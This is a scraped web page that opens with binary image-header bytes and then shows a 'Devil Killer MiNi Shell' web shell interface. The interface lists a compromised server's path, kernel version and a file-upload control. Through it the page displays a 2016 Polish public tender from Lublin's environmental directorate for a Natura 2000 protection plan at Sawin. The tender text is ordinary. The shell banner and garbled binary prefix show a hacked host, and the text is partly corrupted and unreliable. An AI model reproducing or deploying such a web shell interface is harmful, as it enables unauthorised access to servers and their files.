JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160518/126406-N-2016.html

<p class="kh_header"><b>Lublin: Opracowanie projektu planu zadań ochronnych dla obszaru Natura 2000 Sawin PLH060068, w ramach projektu Ochrona bioróżnorodności siedlisk trawiastych wschodniej Lubelszczyzny dofinansowanego przez Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014</b><br>
<b>Numer ogłoszenia: 126406 - 2016; data zamieszczenia: 18.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Ochrony Środowiska w Lublinie , ul. Bazylianówka 46, 20-144 Lublin, woj. lubelskie, tel. 81 710 65 00, faks 81 710 65 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> lublin.rdos.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu planu zadań ochronnych dla obszaru Natura 2000 Sawin PLH060068, w ramach projektu Ochrona bioróżnorodności siedlisk trawiastych wschodniej Lubelszczyzny dofinansowanego przez Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: 1.Opracowanie projektu planu zadań ochronnych dla obszaru Natura 2000 Sawin PLH060068, w ramach projektu Ochrona bioróżnorodności siedlisk trawiastych wschodniej Lubelszczyzny dofinansowanego przez Mechanizm Finansowy Europejskiego Obszaru Gospodarczego 2009-2014.
2. Zakres zamówienia obejmuje: 
2.1. analizę istniejących opracowań dotyczących obszarów Natura 2000
 	(publikowanych i niepublikowanych); Obowiązkiem Wykonawcy jest
 	dążenie do identyfikacji, pozyskania i przeanalizowania wszystkich
 	dostępnych źródeł informacji o obszarach Natura 2000 i przedmiotach
 	ochrony,
2.2. wykonanie niezbędnych prac terenowych, w tym:
2.2.1. weryfikację danych o rozmieszczeniu siedlisk,
            będących przedmiotami ochrony w obszarach,
2.2.2. inwentaryzację  przedmiotów ochrony w obszarze Natura 2000
      w zakresie siedlisk, będących przedmiotami ochrony
           w obszarze Natura 2000 tj. 6410 Zmiennowilgotne łąki trzęślicowe (Molinion), 7210 Torfowiska nakredowe (Cladietum marisci, Caricetum buxbaumii, Schoenetum nigricantis, 7230 Górskie i nizinne torfowiska zasadowe o charakterze młak, turzycowisk i mechowisk,
2.3. zgromadzenie, zweryfikowanie i uzupełnienie informacji o obszarach
	i przedmiotach ochrony, istotnych dla ochrony, w tym dotyczących:
2.3.1. uwarunkowań geograficznych, przyrodniczych (w tym
	w regionalizacji przyrodniczo-leśnej, geobotanicznej
	i zoogeograficznej, głównych typach gleb, warunkach 	klimatycznych, 	wodach powierzchniowych, jednolitych
 	częściach wód), społecznych, gospodarczych i kulturowych,
 	kierunków 	rozwoju społecznego i gospodarczego, a także
 	uwarunkowań 	wynikających z istniejących form ochrony
 	przyrody innych niż 	obszar i celów ochrony obszaru oraz
 	zestawienie rodzajów użytków 	gruntowych położonych
	w Obszarze, w szczególności w obrębie przedmiotów ochrony, dla 	których ochrony Obszar ten został utworzony (z podaniem
 	informacji o stosunkach własnościowych w odniesieniu do tych 	gruntów), z uwzględnieniem danych z ewidencji gruntów,
2.3.2. występowania przedmiotów ochrony oraz opisu ich stanu, 	zagrożeń, wymogów i możliwości ochrony,
2.3.3. istniejących i projektowanych planów, studiów uwarunkowań
	i kierunków zagospodarowania przestrzennego gmin, strategii
	i programów dotyczących obszaru lub mogących mieć na niego 	wpływ,
2.4. ocenę stanu ochrony przedmiotów ochrony, dokonywaną na podstawie 	dostępnych informacji i niezbędnych prac terenowych uzupełniających 	inwentaryzację, charakterystyki jakościowe lub rozpoznanie uwarunkowań 	funkcjonowania przedmiotów ochrony, polegającą na łącznej ocenie stanu 	ochrony siedlisk przyrodniczych:
2.4.1. w odniesieniu do siedlisk przyrodniczych:
2.4.1.1. ustaleniu parametru powierzchni i rozmieszczenia 	siedliska przyrodniczego w obszarze, z uwzględnieniem 	jego fragmentacji, trendu zachodzących zmian oraz 	fragmentacji poszczególnych wydzieleń siedliska 	przyrodniczego,
2.4.1.2. ustaleniu parametru struktury poszczególnych	wydzieleń siedliska przyrodniczego, z uwzględnieniem	stanu ochrony jego typowych gatunków oraz procesów
 	ekologicznych zachodzących w tym wydzieleniu,
	w porównaniu ze strukturą i procesami typowymi dla
 	właściwego stanu ochrony siedliska,
2.4.1.3. ocenie parametru szans zachowania siedliska 	przyrodniczego w przyszłości;
2.5. ocenę istniejących i potencjalnych zagrożeń dla utrzymania lub
 	osiągnięcia właściwego stanu przedmiotów ochrony oraz oceny
 	prawdopodobnych kierunków zmian uwarunkowań przyrodniczych,	społecznych, gospodarczych i ich możliwego wpływu na parametry.
2.6. ustalenie celów działań ochronnych do osiągnięcia w okresie, na jaki jest
 	sporządzany plan zadań ochronnych, umożliwiające monitoring
	i weryfikację ich osiągnięcia, z uwzględnieniem:
2.6.1. konieczności utrzymania właściwego stanu ochrony, likwidacji,
 	ograniczenia istniejących lub potencjalnych zagrożeń dla	przedmiotu ochrony lub zapobieżenia im - jeżeli obecny stan	przedmiotów ochrony w obszarze został oceniony, jako właściwy,
2.6.2. potrzeby osiągnięcia właściwego stanu ochrony, konieczności
 	likwidacji, ograniczenia istniejących lub potencjalnych zagrożeń
	odpowiedzialnych za niewłaściwy stan ochrony przedmiotu ochrony 	lub zapobieżenia im - jeżeli obecny stan przedmiotów ochrony
	w obszarze został oceniony, jako niezadowalający lub zły,
2.6.3. konieczności uzupełnienia stanu wiedzy o przedmiocie ochrony
	i konieczności likwidacji, ograniczenia zagrożeń dla przedmiotu
 	ochrony lub zapobieżenia im - jeżeli stan ochrony przedmiotu
 	ochrony nie jest możliwy do oceny,
2.7. ustalenie działań ochronnych wynikających z ustalonych celów działań
 	ochronnych, w tym wskazanie:
2.7.1. działań ochronnych zapewniających możliwość monitoringu	osiągnięcia celów działań ochronnych, a zwłaszcza monitoringu	przyjętych parametrów stanu ochrony przedmiotów ochrony, a dla	obszaru znajdującego się na terenie gospodarstwa rolnego lub jego 	części z podziałem na działania obligatoryjne i fakultatywne,
2.7.2. zakresu prac przewidzianych do realizacji,
2.7.3. terenu lub miejsca realizacji,
2.7.4. terminu oraz częstotliwości realizacji,
2.7.5. podmiotu odpowiedzialnego za wykonanie i monitoring,
2.7.6. szacowanych kosztów realizacji działań,
2.7.7. technicznych uwarunkowań realizacji działań,
2.7.8. podmiotów, których współdziałanie przy realizacji działań 	ochronnych jest niezbędne,
2.8. ustalenie, w oparciu o analizę obowiązujących studiów uwarunkowań
	i kierunków zagospodarowania przestrzennego gmin, miejscowych
 	planów zagospodarowania przestrzennego i innych dokumentów	strategicznych, których realizacja naruszy lub stworzy ryzyko naruszenia
 	zakazu, o którym mowa w art. 33 ustawy z dnia 16 kwietnia 2004 r.
	o ochronie przyrody (Dz. U. z 2013. poz.627 ze zm.);
2.9. ocenę potrzeby sporządzenia planu ochrony dla części lub całości	obszaru oraz określenie terminu jego sporządzenia, z uwzględnieniem	konieczności; 
2.9.1. przeprowadzenia inwentaryzacji lub badań przedmiotów ochrony lub
2.9.2. zaplanowania ochrony w okresie 20 lat lub 
2.9.3. zmiany granic obszaru lub przedmiotu ochrony,
2.10. sprawdzenie i ewentualna korekta wyznaczonych granic obszaru
 	Natura 2000  oraz opis i uszczegółowienie przebiegu na podstawie granic
	z ewidencji gruntów i budynków w formie wektorowych warstw
 	informacyjnych zgodnie z metodami i trybem określonym
	w Rozporządzeniu Ministra Środowiska z dnia 17 lutego 2010 w sprawie
 	sporządzania projektu planu zadań ochronnych dla obszaru Natura 2000
 	(Dz. U. Nr 34, poz. 186); 
2.11. aktualizacja Standardowego Formularza Danych Obszaru (SDF) oraz	przebiegu granic Obszaru Natura 2000, wskazanie propozycji zmian	granic uzasadnionych przedmiotami ochrony,
2.12. przygotowanie odpowiedzi na zgłaszane wnioski i postulaty oraz
 	przygotowania materiałów do publikacji w generatorze projektu lub
 	w innych cyfrowych mediach, wprowadzenia zmian do standardowych	formularzy danych (SDF) i opracowania wytycznych do dokumentów	dotyczących przestrzennego zagospodarowania gmin w stosunku do
 	obszaru Natura 2000,
2.13. Opracowanie i przekazanie wyników inwentaryzacji przyrodniczych oraz 	wszelkich innych danych o charakterze przestrzennym takich jak np. 	stanowisk i obszarów występowania siedlisk przyrodniczych, kart	obserwacji siedliska przyrodniczego na stanowisku
 	(zgodnych z kartami obserwacji zamieszczonych w podręcznikach
 	monitoringu GIOŚ), mapy zagrożeń i działań	ochronnych, miejsc lub
 	powierzchni	przeznaczonych do monitoringu, będących wynikiem prac	nad PZO dla obszaru Natura 2000 oraz	pozostałych informacji, które są	niezbędne do	zobrazowania ustaleń	planu ochrony (m.in.	szlaków komunikacyjnych, jednostek osadniczych, form użytkowania	terenu, lasów, wód powierzchniowych, infrastruktury technicznej
	i turystycznej) i przekazanie ich w formie cyfrowych warstw wektorowych	używanych w systemach informacji przestrzennej (GIS) oraz cyfrowych
 	map	tematycznych i ich wydruków,
2.14. Warstwy wektorowe mają spełniać wymagania:
2.14.1. każda informacja (punkt, linia, poligon) ma posiadać tzw.	metadane, czyli dane o danych - zgodne z dyrektywą INSPIRE. Do
 	metadanych należą informacje, m. in. o źródle danych, aktualności, 	właścicielu, organie referencyjnym itp.,
2.14.2. format pliku w którym wykonawca przekaże zamawiającemu
           dane to obligatoryjnie ESRI shapefile (*.shp),
2.14.3. cyfrowe mapy tematyczne przedstawiające wyniki inwentaryzacji 	powinny być sporządzone w oparciu o mapy państwowego zasobu 	geodezyjnego i kartograficznego,
2.14.4. podkład rastrowy ma spełniać wymagania: 
2.14.4.1. skala 1:10 000 oraz 1:25 000, 
2.14.4.2. kolor (RGB 24bit), 
2.14.4.3. skalibrowany do układu współrzędnych PUWG 1992
i zapisany w pliku TIFF niosącym informacje o georeferencji, tzw. GeoTIFF;
2.15. organizacja procesu komunikacji z różnymi grupami interesu. 
2.15.1. Wykonawca w porozumieniu z Zamawiającym ustali
 	proponowaną listę członków Zespołu Lokalnej Współpracy, zwanej
 	dalej ZLW. Wykonawca zorganizuje i przeprowadzi cykl spotkań dla 	członków ZLW. Ze względu na wielkość obszaru Natura 2000,	spotkania powinny odbywać się w miejscach umożliwiającym	wszystkim uczestnikom łatwy dojazd. Minimalna liczba spotkań do
          zrealizowania - 2.
2.15.2. wykonawca odpowiada za:
2.15.2.1. opracowanie programu, spotkanie i jego	przeprowadzenie, 
2.15.2.2. zapewnienie sali (dla około 30 osób), wyposażonej
	w urządzenia multimedialne umożliwiające przedstawienie 	prezentacji,
2.15.3. zapewnienie cateringu (wszystkim uczestnikom	spotkania należy zapewnić napoje ciepłe (kawa, herbata,
 	mleko do kawy, cytryna, cukier), napoje zimne (woda	gazowana, niegazowana, soki  min, 0,5 l /os), przekąski	(np. paluszki, ciastka), świeże ciasto - min. 2 rodzaje,
 	świeże owoce). Serwis kawowy powinien zostać podany	na stołach przykrytych obrusem, w zastawie ceramicznej
 	lub szklanej wraz z serwetkami i sztućcami,
2.15.3. miejsce i termin spotkań oraz program spotkania musi zostać	uzgodniony z Zamawiającym, na co najmniej 21 dni, przed
 	spotkaniem,
2.15.4. jedno ze spotkań może mieć charakter wizji terenowej
           w obszarze Natura 2000,
2.16. do obowiązków Wykonawcy należy przygotowanie i bieżące	przekazywanie materiałów z poszczególnych etapów prac
 	Koordynatorowi planu w celu systematycznego wypełniania formularza,
 	zgodnie z harmonogramem opracowanym wspólnie z Zamawiającym po
 	podpisaniu umowy,
2.17. produkt końcowy przedmiotu zamówienia:
2.17.1. zamawiający wymaga sporządzenia projektu Planu oraz Projekt
 	zarządzenia Regionalnego Dyrektora Ochrony Środowiska
	w formie wydruków, które należy dostarczyć w dwóch
 	egzemplarzach, oprawionych w sposób uniemożliwiający	wydostanie się kartek - w oparciu o załącznik (SZABLON),
2.17.2. dodatkowo Zamawiający wymaga dostarczenia projektu Planu
 	zapisanego na nośniku cyfrowym - płycie CD lub DVD (dwa	egzemplarze), z następującymi zastrzeżeniami:
2.17.2.1. dokumenty tekstowe i tabele należy zapisać
		w formacie pdf,
2.17.2.2. cyfrowe warstwy wektorowe należy zapisać
		w formacie zgodnym z wytycznymi Standard
		danych GIS w ochronie przyrody (wersja 3.03.01),
2.17.3. dokumenty końcowe wynikające z realizacji przedmiotu
			zamówienia należy oznaczyć zgodnie z Podręcznikiem
			Komunikacji i Identyfikacji Wizualnej oraz Wymogami
			Dotyczącymi Informacji i Promocji dla projektów
			realizowanych z funduszy EOG, dostępnym na stronie
 		internetowej:
http://www.eog.gov.pl/Dokumenty/Informacja_i_promocja/Documents/Wytyczn_Podrecznik_wizualizacji.pdf, 
oraz umieścić zapis: Opracowano w ramach projektu Ochrona bioróżnorodności siedlisk trawiastych wschodniej Lubelszczyzny..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.70.00.00-4, 90.71.13.00-7, 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę winien wnieść wadium przed upływem terminu składania ofert, w wysokości 350,00 zł (słownie: trzysta pięćdziesiąt złotych i 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą wykonanie minimum 1 usługi z zakresu
wykonania planu ochrony lub planu zadań ochronnych dla obszaru Natura 2000 albo inwentaryzacji przyrodniczej siedlisk lub gatunków
Natura 2000 na potrzeby sporządzenia planu ochrony lub planu zadań ochronnych obszaru Natura 2000 o wartości nie mniejszej niż
2.000 zł brutto każda, w okresie ostatnich ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób
szczegółowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą: -dysponowanie minimum 1 osobą,
która będzie koordynować wykonanie zamówienia oraz posiada doświadczenie w realizacji minimum jednej usługi wykonania planu
zadań ochronnych dla obszaru Natura 2000 lub planu ochrony następujących form ochrony przyrody: obszaru Natura 2000 lub parku
krajobrazowego lub rezerwatu przyrody lub parku narodowego lub inwentaryzacji przyrodniczej siedlisk i gatunków natura 2000 lub
monitoringu siedlisk i gatunków Natura 2000, -dysponowanie minimum 1 osobą, która ukończyła studia wyższe na kierunku biologia
lub ochrona środowiska lub leśnictwo i dysponuje wiedzą z zakresu botaniki i fitosocjologii, -dysponowanie minimum 1 osobą, która
ukończyła studia wyższe na kierunku biologia lub ochrona środowiska lub leśnictwo i dysponuje wiedzą z zakresu ekologii,
-dysponowanie minimum 1 osobą, która dysponuje wiedzą z zakresu GIS.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób
szczegółowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>1. Wykaz winien wskazywać wykonanie usług polegających na wykonaniu planu ochrony lub planu zadań ochronnych dla obszaru Natura
2000 albo inwentaryzacji przyrodniczej siedlisk lub gatunków Natura 2000 na potrzeby sporządzenia planu ochrony lub planu zadań
ochronnych obszaru Natura 2000 o wartości nie mniejszej niż 2.000 zł brutto każda, w okresie ostatnich ostatnich 3 lat przed upływem
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 2. Złożone poświadczenia winny
potwierdzać należyte wykonanie usług polegających na wykonaniu planu ochrony lub planu zadań ochronnych dla obszaru Natura 2000
albo inwentaryzacji przyrodniczej siedlisk lub gatunków Natura 2000 na potrzeby sporządzenia planu ochrony lub planu zadań ochronnych
obszaru Natura 2000, w okresie ostatnich ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności
jest krótszy - w tym okresie;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy
wszystkich wykonawców składających ofertę wspólną. 2.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w
postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo
zamówień publicznych. 3. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę
podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty. 4. W sytuacji,
gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach
finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić
Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się
